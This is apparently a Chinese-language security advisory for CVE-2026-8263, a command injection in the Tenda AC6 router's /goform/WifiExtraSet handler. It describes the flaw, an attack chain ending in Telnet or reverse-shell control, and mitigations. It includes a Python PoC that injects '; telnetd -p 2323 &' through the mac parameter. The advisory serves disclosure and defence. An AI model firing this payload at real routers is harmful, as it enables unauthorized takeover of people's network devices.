CVE-2026-8263 Tenda AC6 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8263

漏洞类型

操作系统命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6

漏洞概述

Tenda AC6 路由器固件版本 15.03.06.49_multi_TDE01 存在安全漏洞。问题出在 httpd 组件的 /goform/WifiExtraSet 接口中的 fromSetWirelessRepeat 函数。由于未正确过滤用户输入的 mac 或 ssid 参数，攻击者可构造恶意请求进行操作系统命令注入。尽管需要高权限，但该漏洞允许远程无交互攻击，可能造成系统机密性、完整性和可用性的低程度影响，且已有公开的利用代码。

技术细节

该漏洞的根源在于 Tenda AC6 路由器 httpd 服务程序对用户输入的验证不足。具体而言，在处理来自 /goform/WifiExtraSet 接口的请求时，fromSetWirelessRepeat 函数接收了用于配置无线中继的 mac 和 ssid 参数。程序直接将这些参数拼接到系统命令中并执行，未进行任何转义或过滤。攻击者若拥有管理员权限（PR:H），可以通过构造包含特定 Shell 元字符（如分号、管道符等）的恶意 payload，欺骗后端执行任意操作系统命令。由于 httpd 通常运行在特权模式下，成功利用此漏洞可能导致攻击者获得设备的控制权，进而读取文件、修改配置或导致拒绝服务。目前网络上已有针对该漏洞的 PoC 代码验证了其有效性。攻击者首先需要登录路由器管理界面获取高权限会话，随后向目标接口发送特制的 HTTP POST 请求，将 payload 注入 mac 或 ssid 字段，从而实现远程命令执行。

攻击链分析

STEP 1

侦察

攻击者识别目标设备为 Tenda AC6 路由器，并确认其运行在存在漏洞的固件版本 15.03.06.49_multi_TDE01 上。

STEP 2

获取权限

由于 CVSS 向量显示 PR:H（高权限），攻击者需要先通过暴力破解、钓鱼或利用其他漏洞获取路由器管理后台的管理员凭证。

STEP 3

漏洞利用

攻击者构造恶意的 HTTP POST 请求发送至 /goform/WifiExtraSet 接口。在请求参数 mac 或 ssid 中插入 Shell 元字符（如 ; 或 |）拼接恶意命令。

STEP 4

命令执行

后端 httpd 服务处理请求时，将受污染的参数直接传递给系统 Shell 执行，导致攻击者注入的命令在设备上运行。

STEP 5

建立控制

攻击者利用执行的命令（如开启 Telnet、反弹 Shell）获取设备系统的进一步控制权，从而窃取数据或持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://192.168.0.1/goform/WifiExtraSet"

# Vulnerable parameters
# The vulnerability exists in 'mac' or 'ssid' parameters.
# Payload example: ';' followed by a command (e.g., 'reboot' or 'telnetd')
command_payload = "; telnetd -p 2323 &"

# Data payload
data = {
    "mac": command_payload,
    "ssid": "TestSSID"
}

# Authentication cookies (PR:H requires High Privileges/Admin access)
# Replace with valid session cookie obtained from login
cookies = {
    "Cookie": "usertype=0; password=...; "
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

try:
    response = requests.post(target_url, data=data, headers=headers, cookies=cookies, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed (e.g., telnet on port 2323).")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Tenda AC6 15.03.06.49_multi_TDE01

防御指南

临时缓解措施

在官方发布修复补丁前，建议用户关闭路由器的远程管理功能，并设置强密码以防止未授权访问。同时，可通过防火墙规则限制对路由器管理端口（通常为 80 或 443）的外部访问，仅允许信任的设备连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8263
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8263
3 Details https://www.cvedetails.com/cve/CVE-2026-8263/
4 VulDB https://vuldb.com/cve/CVE-2026-8263
5 Link https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md
6 Link https://vuldb.com/submit/810074
7 Link https://vuldb.com/vuln/362560
8 Link https://vuldb.com/vuln/362560/cti
9 Link https://www.tenda.com.cn/